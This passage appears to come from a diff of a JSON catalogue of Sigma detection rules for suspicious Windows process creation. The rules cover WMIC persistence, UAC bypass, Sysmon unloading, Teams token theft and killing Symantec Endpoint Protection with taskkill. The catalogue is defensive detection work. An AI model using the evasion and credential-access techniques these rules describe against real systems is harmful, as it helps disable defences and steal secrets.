"logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", - "value": "Winrar Execution in Non-Standard Folder", - "meta": { - "refs": [ - "https://twitter.com/cyb3rops/status/1460978167628406785", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2021/11/17", - "filename": "proc_creation_win_susp_winrar_execution.yml", - "author": "Florian Roth, Tigzy", - "level": "high", - "falsepositive": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "uuid": "074e0ded-6ced-4ebd-8b4d-53f55908119d", - "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", - "meta": { - "refs": [ - "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_awl_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_win_susp_winrm_awl_bypass.yml", - "author": "Julia Fomina, oscd.community", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", - "uuid": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", - "value": "Remote Code Execute via Winrm.vbs", - "meta": { - "refs": [ - "https://twitter.com/bohops/status/994405551751815170", - "https://redcanary.com/blog/lateral-movement-winrm-wmi/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_susp_winrm_execution.yml", - "author": "Julia Fomina, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate use for administartive purposes. Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "uuid": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", - "value": "Compress Data and Lock With Password for Exfiltration With WINZIP", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winzip.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2021/07/27", - "filename": "proc_creation_win_susp_winzip.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects WMIC executions in which a event consumer gets created in order to establish persistence", - "uuid": "ebef4391-1a81-4761-a40a-1db446c0e625", - "value": "Suspicious WMIC ActiveScriptEventConsumer Creation", - "meta": { - "refs": [ - "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.003" - ], - "creation_date": "2021/06/25", - "filename": "proc_creation_win_susp_wmic_eventconsumer_create.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate software creating script event consumers" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects WMIC executing suspicious or recon commands", - "uuid": "526be59f-a573-4eea-b5f7-f0973207634d", - "value": "Suspicious WMIC Execution", - "meta": { - "refs": [ - "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", - "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", - "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "car.2016-03-002" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_wmic_execution.yml", - "author": "Michael Haag, Florian Roth, juju4, oscd.community", - "level": "medium", - "falsepositive": [ - "If using Splunk, we recommend | stats count by Computer,CommandLine following for easy hunting by Computer/CommandLine" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\"...etc", - "uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", - "value": "Suspicious WMIC Execution - ProcessCallCreate", - "meta": { - "refs": [ - "https://thedfirreport.com/2020/10/08/ryuks-return/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_susp_wmic_proc_create.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "uuid": "847d5ff3-8a31-4737-a970-aeae8fe21765", - "value": "Wmic Uninstall Security Product", - "meta": { - "refs": [ - "https://twitter.com/cglyer/status/1355171195654709249", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/01/30", - "filename": "proc_creation_win_susp_wmic_security_product_uninstall.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate administration" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "uuid": "0bbc6369-43e3-453d-9944-cae58821c173", - "value": "Execution via WorkFolders.exe", - "meta": { - "refs": [ - "https://twitter.com/elliotkillick/status/1449812843772227588", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/10/21", - "filename": "proc_creation_win_susp_workfolders.yml", - "author": "Maxime Thiebaut (@0xThiebaut)", - "level": "high", - "falsepositive": [ - "Legitimate usage of the uncommon Windows Work Folders feature." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects code execution via the Windows Update client (wuauclt)", - "uuid": "d7825193-b70a-48a4-b992-8b5b3015cc11", - "value": "Windows Update Client LOLBIN", - "meta": { - "refs": [ - "https://dtm.uk/wuauclt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" - ], - "creation_date": "2020/10/17", - "filename": "proc_creation_win_susp_wuauclt.yml", - "author": "FPT.EagleEye Team", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135", - "value": "Suspicious Windows Update Agent Empty Cmdline", - "meta": { - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/26", - "filename": "proc_creation_win_susp_wuauclt_cmdline.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", - "uuid": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", - "value": "Suspicious ZipExec Execution", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1451237393017839616", - "https://github.com/Tylous/ZipExec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zipexec.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ], - "creation_date": "2021/11/07", - "filename": "proc_creation_win_susp_zipexec.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "uuid": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", - "value": "Zip A Folder With PowerShell For Staging In Temp", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zip_compress.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074.001" - ], - "creation_date": "2021/07/20", - "filename": "proc_creation_win_susp_zip_compress.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "uuid": "0a13e132-651d-11eb-ae93-0242ac130002", - "value": "Suspicious Auditpol Usage", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sus_auditpol_usage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2021/02/02", - "filename": "proc_creation_win_sus_auditpol_usage.yml", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", - "level": "high", - "falsepositive": [ - "Admin activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of Sysinternals Tools due to accepteula option being seen in the command line.", - "uuid": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", - "value": "Usage of Sysinternals Tools", - "meta": { - "refs": [ - "https://twitter.com/Moti_B/status/1008587936735035392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "creation_date": "2017/08/28", - "filename": "proc_creation_win_sysinternals_eula_accepted.yml", - "author": "Markus Neis", - "level": "low", - "falsepositive": [ - "Legitimate use of SysInternals tools", - "Programs that use the same Registry Key" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of Sysinternals PsService for service reconnaissance or tamper", - "uuid": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", - "value": "Use of Sysinternals PsService", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psservice", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml" - ], - "tags": [ - "attack.discovery", - "attack.persistence", - "attack.t1543.003" - ], - "creation_date": "2022/06/16", - "filename": "proc_creation_win_sysinternals_psservice.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of PsService by an administrator" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of SharpEvtHook, a tool to tamper with Windows event logs", - "uuid": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", - "value": "SharpEvtMute EvtMuteHook Load", - "meta": { - "refs": [ - "https://github.com/bats3c/EvtMute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2022/09/07", - "filename": "proc_creation_win_sysmon_disable_sharpevtmute.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect possible Sysmon driver unload", - "uuid": "4d7cda18-1b12-4e52-b45c-d28653210df8", - "value": "Sysmon Driver Unload", - "meta": { - "refs": [ - "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_driver_unload.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" - ], - "creation_date": "2019/10/23", - "filename": "proc_creation_win_sysmon_driver_unload.yml", - "author": "Kirill Kiryanov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "uuid": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "value": "Suspicious Sysmon as Execution Parent", - "meta": { - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120", - "https://twitter.com/filip_dragovic/status/1590052248260055041", - "https://twitter.com/filip_dragovic/status/1590104354727436290", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml" - ], - "tags": "No established tags", - "creation_date": "2022/11/10", - "filename": "proc_creation_win_sysmon_exploitation.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects UAC bypass method using Windows event viewer", - "uuid": "be344333-921d-4c4d-8bb8-e584cf584780", - "value": "UAC Bypass via Event Viewer", - "meta": { - "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", - "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" - ], - "creation_date": "2017/03/19", - "filename": "proc_creation_win_sysmon_uac_bypass_eventvwr.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", - "uuid": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", - "value": "Process Creation Using Sysnative Folder", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysnative.yml" - ], - "tags": [ - "attack.t1055" - ], - "creation_date": "2022/08/23", - "filename": "proc_creation_win_sysnative.yml", - "author": "Max Altgelt", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Windows program executable started from a suspicious folder", - "uuid": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "value": "System File Execution Location Anomaly", - "meta": { - "refs": [ - "https://twitter.com/GelosSnake/status/934900723426439170", - "https://asec.ahnlab.com/en/39828/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2017/11/27", - "filename": "proc_creation_win_system_exe_anomaly.yml", - "author": "Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Exotic software" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "uuid": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "value": "Tamper Windows Defender Remove-MpPreference", - "meta": { - "refs": [ - "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/05", - "filename": "proc_creation_win_tamper_defender_remove_mppreference.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", - "uuid": "99793437-3e16-439b-be0f-078782cf953d", - "value": "Tap Installer Execution", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tap_installer_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_tap_installer_execution.yml", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate OpenVPN TAP insntallation" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects one of the possible scenarios for disabling symantec endpoint protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "uuid": "4a6713f6-3331-11ed-a261-0242ac120002", - "value": "Taskkill Symantec Endpoint Protection", - "meta": { - "refs": [ - "https://www.exploit-db.com/exploits/37525", - "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", - "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/09/13", - "filename": "proc_creation_win_taskkill_sep.yml", - "author": "Ilya Krestinichev, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "uuid": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "value": "Tasks Folder Evasion", - "meta": { - "refs": [ - "https://twitter.com/subTee/status/1216465628946563073", - "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.execution", - "attack.t1574.002" - ], - "creation_date": "2020/01/13", - "filename": "proc_creation_win_task_folder_evasion.yml", - "author": "Sreeman", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "uuid": "d2eb17db-1d39-41dc-b57f-301f6512fa75", - "value": "Suspicious Command With Teams Objects Pathes", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", - "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1528" - ], - "creation_date": "2022/09/16", - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml", - "author": "@SerkinValery", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "uuid": "1012f107-b8f1-4271-af30-5aed2de89b39", - "value": "Terminal Service Process Spawn", - "meta": { - "refs": [ - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "creation_date": "2019/05/22", - "filename": "proc_creation_win_termserv_proc_spawn.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", - "uuid": "5589ab4f-a767-433c-961d-c91f3f704db1", - "value": "SMB Relay Attack Tools", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1557/001/", - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://pentestlab.blog/2017/04/13/hot-potato/", - "https://github.com/ohpe/juicy-potato", - "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", - "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml" - ], - "tags": [ - "attack.execution", - "attack.t1557.001" - ], - "creation_date": "2021/07/24", - "filename": "proc_creation_win_tools_relay_attacks.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Legitimate files with these rare hacktool names" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", - "uuid": "3c05e90d-7eba-4324-9972-5d7f711a60a8", - "value": "UAC Bypass Tools Using ComputerDefaults", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/31", - "filename": "proc_creation_win_tools_uac_bypass_computerdefaults.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", - "uuid": "4e2ed651-1906-4a59-a78a-18220fca1b22", - "value": "NirCmd Tool Execution", - "meta": { - "refs": [ - "https://www.nirsoft.net/utils/nircmd.html", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://www.nirsoft.net/utils/nircmd2.html#using", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2022/01/24", - "filename": "proc_creation_win_tool_nircmd.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use by administrators" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "uuid": "d9047477-0359-48c9-b8c7-792cedcdc9c4", - "value": "NirCmd Tool Execution As LOCAL SYSTEM", - "meta": { - "refs": [ - "https://www.nirsoft.net/utils/nircmd.html", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://www.nirsoft.net/utils/nircmd2.html#using", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2022/01/24", - "filename": "proc_creation_win_tool_nircmd_as_system.yml", - "author": "Florian Roth, Nasreddine Bencherchali @nas_bench", - "level": "high", - "falsepositive": [ - "Legitimate use by administrators" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of NSudo tool for command execution", - "uuid": "771d1eb5-9587-4568-95fb-9ec44153a012", - "value": "NSudo Tool Execution", - "meta": { - "refs": [ - "https://nsudo.m2team.org/en-us/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2022/01/24", - "filename": "proc_creation_win_tool_nsudo_execution.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate use by administrators" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PsExec service execution via default service image name", - "uuid": "fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba", - "value": "PsExec Tool Execution", - "meta": { - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_psexec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2017/06/12", - "filename": "proc_creation_win_tool_psexec.yml", - "author": "Thomas Patzke", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of RunXCmd tool for command execution", - "uuid": "93199800-b52a-4dec-b762-75212c196542", - "value": "RunXCmd Tool Execution As System", - "meta": { - "refs": [ - "https://www.d7xtech.com/free-software/runx/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ], - "creation_date": "2022/01/24", - "filename": "proc_creation_win_tool_runx_as_system.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use by administrators" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "uuid": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", - "value": "Tor Client or Tor Browser Use", - "meta": { - "refs": [ - "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tor_browser.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090.003" - ], - "creation_date": "2022/02/20", - "filename": "proc_creation_win_tor_browser.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of TruffleSnout.exe", - "uuid": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", - "value": "Launch TruffleSnout Executable", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", - "https://github.com/dsnezhkov/TruffleSnout", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trufflesnout.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ], - "creation_date": "2022/08/20", - "filename": "proc_creation_win_trufflesnout.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Identifies execution of nltest.exe and dsquery.exe for domain trust discovery. This technique is used by attackers to enumerate Active Directory trusts.", - "uuid": "3bad990e-4848-4a78-9530-b427d854aac0", - "value": "Domain 